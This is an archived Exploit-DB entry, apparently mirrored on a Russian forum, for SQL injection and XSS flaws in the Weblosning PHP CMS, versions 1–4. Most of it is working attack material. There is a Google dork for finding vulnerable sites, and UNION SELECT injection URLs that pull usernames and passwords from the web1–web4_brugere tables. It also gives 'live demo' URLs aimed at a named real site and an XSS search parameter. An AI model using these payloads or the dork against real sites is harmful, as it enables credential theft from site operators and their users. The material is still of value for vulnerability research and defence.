- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 5664
- Проверка EDB
-
- Пройдено
- Автор
- MR.SQL
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2008-2506 cve-2008-2505
- Дата публикации
- 2008-05-21
Код:
################ Viva IsLaM ################
# (sql / xss ) Multiple Vulnerabilities
#
# weblosning V1, V2,V3,V4 (( index2.php id ))
############################################
## Script Name : Weblosning (( V1, V2,V3,V4 ))
##
## Demo : http://www.simpelside.dk/
############################################
##
## AuTh0r: Mr.SQL
## H0ME : WwW.PaL-HaCkEr.CoM
## Email : [email protected]
##
############################################
## (( V1 ::V2 :: V3 :: V4 ))
##
## D0rk : allinurl: "index2.php" mainid
##
====>>> SQL ::::::::
V1 =====>> http://www.target.dk/ index2.php?id=31&mainid=-1+union+select+1,2,3,concat_ws(0x3a3a,brugernavn,adgangskode),5,6+from+web1_brugere/*
V2 =====>> http://www.target.dk/ index2.php?id=31&mainid=-1+union+select+1,2,3,concat_ws(0x3a3a,brugernavn,adgangskode),5,6+from+web2_brugere/*
V3 =====>> http://www.target.dk/ index2.php?id=31&mainid=-1+union+select+1,2,3,concat_ws(0x3a3a,brugernavn,adgangskode),5,6+from+web3_brugere/*
V4 =====>> http://www.target.dk/ index2.php?id=31&mainid=-1+union+select+1,2,3,concat_ws(0x3a3a,brugernavn,adgangskode),5,6+from+web4_brugere/*
## Note ## plz use all exploits to have good results , the sites have difrrent versions , so you must test all tables name on targets the ,table name like this [ web1_brugere , web2_brugere , web3_brugere , web4_brugere ] to know script version
## Video How to use tables :) http://www.4shared.com/file/48485309/1fa3df0/weblosning.html
## :: liVe DeM0 ::
version (1) http://www.simpelside.dk/web1/index2.php?id=-4+union+select+1,2,concat_ws(0x3a3a,brugernavn,adgangskode),4,5,6+from+web1_brugere/*
version (2) http://www.simpelside.dk/web2/index2.php?id=2&mainid=-1+union+select+1,concat_ws(0x3a3a,brugernavn,adgangskode),3+from+web2_brugere/*
version (3) http://www.simpelside.dk/web3/index2.php?id=-3+union+select+1,concat_ws(0x3a3a,brugernavn,adgangskode),3,4,5,6+from+web3_brugere/*
version (4) http://www.simpelside.dk/web4/index2.php?id=-1+union+select+1,concat_ws(0x3a3a,brugernavn,adgangskode),3,4,5,6+from+web4_brugere/*
#########################################################################################
====>> xss ::::::
http://www.target.dk/web1/result.php?search= (xss)
====>>
EX :::: http://www.simpelside.dk/web1/result.php?search= Viva%20Islam%20
#########################################################################################
<< Gr33Tz>> (( HaCkEr-EGy )) :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: HeBarieH :: (( MuslimS HaCkErS ))
#########################################################################################
-(:::: Geek Inj3cT0r ::::)-
# milw0rm.com [2008-05-21]
- Источник
- www.exploit-db.com